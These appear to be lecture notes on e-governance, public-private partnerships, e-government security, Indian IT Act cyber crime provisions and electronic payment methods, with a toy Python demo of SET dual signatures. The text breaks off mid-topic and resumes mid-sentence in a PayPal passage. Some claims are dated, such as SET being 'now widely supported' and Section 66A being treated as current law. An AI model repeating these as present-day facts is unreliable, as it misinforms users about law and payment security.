Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as the definition of e-governance is that it makes no provision for the governance of ICTs themselves. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects, each of which involved a mammoth state-wide area network.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services such as Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While the CORBA Security standard leans heavily on those technologies, public key security with Secure Sockets Layer (SSL), today its successor TLS, is what is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows

G2G (Government to Government)

In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output


G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through Internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community, the providers of goods and services, to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and businesses via the Internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
– Long Term Contracts
– User Charges and/or Payments flowing between the Parties
– Shared Investments, but Mainly Private
– Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master ScheduleBudget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow

Procurement Approach

Sole Source RFP Low Bid

Risk Allocation between Public and private Partners

Structuring of ContractRisks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administ
rations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms) and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, with the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

• monitoring and reviewing the performance and effectiveness of the ISMS;

• continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

• Authorization: the capability to grant access rights to resources; the process of verifying that someone has the right to do what they are trying to do.

• Confidentiality: the capability to prevent unauthorized access to information.

• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

• Traceability: the capability to chronologically link any transaction to the person or system that performed the action, in a way that is verifiable.

• Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

• Protecting premises, equipment and system software, including input-output units.

• Protecting software applications used to process personal data.

• Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks.

• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Despite this, trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been addressed: as the UN 2012 Survey shows, only 20 per cent of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks include techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.

• Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.

• Continually improve its control environment.

• Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research study found that 816 e-Government websites from 212 different countries were vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability that attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

• 121 million Internet users

• 65 million active Internet users, up 28 per cent from 51 million in 2010

• 50 million users shop online on e-commerce and online shopping sites

• 46+ million social network users

• 346 million mobile users had subscribed to data packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• secures access;

• downloads, copies or extracts any data, computer database or any information;

• introduces or causes to be introduced any virus or contaminant;

• disrupts or causes disruption;

• denies or causes denial of access to any person;

• provides any assistance to any person to facilitate access;

• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or

• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years, or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted in the electronic form, any material which contains sexually explicit act or conduct, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified, for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This Act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment

65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can constitute cyber crime.


users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function as PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features, such as the ability to send payments as attachments via email.


CHARACTERISTICS OF PAYMENT SYSTEM

• There is no paper involved, so electronic payments can be effected directly from home or office.

• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.

• Electronic payments are fully traceable.

• In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.

• Most banks offer same-day value for payments made to other accounts held in that same bank.

• Many banks offer same-day money transfer inter-bank services for large value payments.

• Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.


Features of Payment Methods

• Anonymity: whether the payment method is anonymous

• Security: whether the payment method is secure

• Overhead cost: the overhead cost of processing a payment

• Transferability: whether a payment can be carried out without the involvement of a third party

• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment

• Acceptability: whether the payment method is supported globally

4C PAYMENTS METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash

• Credit card

• Check

• Credit/debit (fund transfer)

• A payment method should be:

– very secure

– having low overhead cost

– transferable

– acceptable anywhere

– divisible

– anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it cannot support on-line credit card authorization.

SET was specially developed to provide secure credit card payment over the Internet. It is now widely supported by major credit card companies, including Visa and MasterCard.


• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality: sensitive messages are encrypted so that they are kept confidential.

– Integrity: nearly all messages are digitally signed to ensure content integrity.

– Authentication: authentication is performed through a public key infrastructure.

SET network architecture

• Merchant: a seller, which is connected to an acquirer.

• Cardholder: a registered holder of the credit card, who is a buyer.

• Issuer: the bank that issues the credit card to a cardholder.

• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.

• A merchant can process various credit cards through a single acquirer.

• Payment Gateway: this is typically connected to the acquirer.

– The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

SET Digital Certificate System


Dual signature generation and verification –

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– the cardholder's authentication relies on simple signature checking only.

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes H[ H[PI] || H[OI] ].

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows: D_RSA[ DS | key_public_sign,cardholder ], where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or PI is changed, the dual signature will no longer be valid.
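The dual signature generation and the merchant-side and gateway-side checks described above, as an added example that is not part of the original notes. It assumes a constructed textbook RSA key (fixed Mersenne primes, no padding) and SHA-256 as the digest H, so it shows the mechanism only, not a deployable implementation.

```python
# Added example: SET-style dual signature over Order Information (OI) and
# Payment Instructions (PI).  DS = Sign_cardholder( H[ H[PI] || H[OI] ] ).
# The RSA key below is a constructed demo key (unpadded textbook RSA), and
# SHA-256 stands in for the digest H; neither is production-grade.
import hashlib


def H(data: bytes) -> bytes:
    """Message digest H used throughout (SHA-256 here)."""
    return hashlib.sha256(data).digest()


# --- constructed cardholder signature key (NOT secure, for illustration) ---
P = 2**127 - 1            # Mersenne prime M127
Q = 2**521 - 1            # Mersenne prime M521
N = P * Q                 # ~648-bit modulus: a 256-bit digest is always < N
E = 65537                 # public exponent; coprime with PHI for these primes
PHI = (P - 1) * (Q - 1)
D = pow(E, -1, PHI)       # private signature exponent (Python 3.8+)


def rsa_sign(digest: bytes) -> int:
    """Cardholder: encrypt the digest with the private signature key."""
    return pow(int.from_bytes(digest, "big"), D, N)


def rsa_recover(sig: int) -> int:
    """Verifier: D_RSA[ DS | key_public_sign,cardholder ] as an integer."""
    return pow(sig, E, N)


def make_dual_signature(oi: bytes, pi: bytes) -> int:
    """DS = Sign( H[ H[PI] || H[OI] ] ), computed by the cardholder."""
    return rsa_sign(H(H(pi) + H(oi)))


def merchant_verify(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant holds OI, H[PI] and DS; it never sees PI itself."""
    expected = H(h_pi + H(oi))                     # Step 1: H[ H[PI] || H[OI] ]
    recovered = rsa_recover(ds)                    # Step 2: decrypt DS
    return recovered == int.from_bytes(expected, "big")   # Step 3: compare


def gateway_verify(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway holds PI, H[OI] and DS; it never sees OI itself."""
    expected = H(H(pi) + h_oi)
    return rsa_recover(ds) == int.from_bytes(expected, "big")


def demo() -> dict:
    """Constructed sample OI/PI; returns the four verification outcomes."""
    oi = b"order=42;item=SKU-1001;qty=2;amount=59.90"
    pi = b"pan=4111111111111111;exp=12/29;amount=59.90"   # standard test PAN
    ds = make_dual_signature(oi, pi)
    return {
        "merchant_ok": merchant_verify(oi, H(pi), ds),
        "gateway_ok": gateway_verify(pi, H(oi), ds),
        # Altering either half in transit breaks the linkage for both parties.
        "tampered_oi": merchant_verify(oi.replace(b"59.90", b"5.90"), H(pi), ds),
        "tampered_pi": gateway_verify(pi.replace(b"59.90", b"5.90"), H(oi), ds),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```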

DIGITAL ENVELOPE –


SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

• First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

• In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

• In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

• Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers

• Customers

• Merchants or traders

• Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are the related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

• Account setup: customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts with various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

• Purchase: customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

• Authentication: merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works:


This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained in the following slides.

The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant to acquire services, for which the customer authenticates the payment to the trader.


In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds, which are transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another. Like the serial numbers on real currency notes, the E-cash numbers are unique. Each is issued by a bank and represents a specified sum of real money. It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.

• Anonymity is preserved unless double spending is attempted.

• Serial numbers can allow tracing to prevent money laundering.

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind Internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on a safe "https" protocol, and using proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

• Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.

• E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system may be, no one is safe against online fraud. In this case the trader is referred to as fraudulent: the trader may take the amount but not provide the services.

• While making the payment, it is very important that the Internet connection and power supply remain active. If the payment is in process and the Internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

• E-Cash is not for everyone. Low-income segments without computer and Internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make E-Cash more complete. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

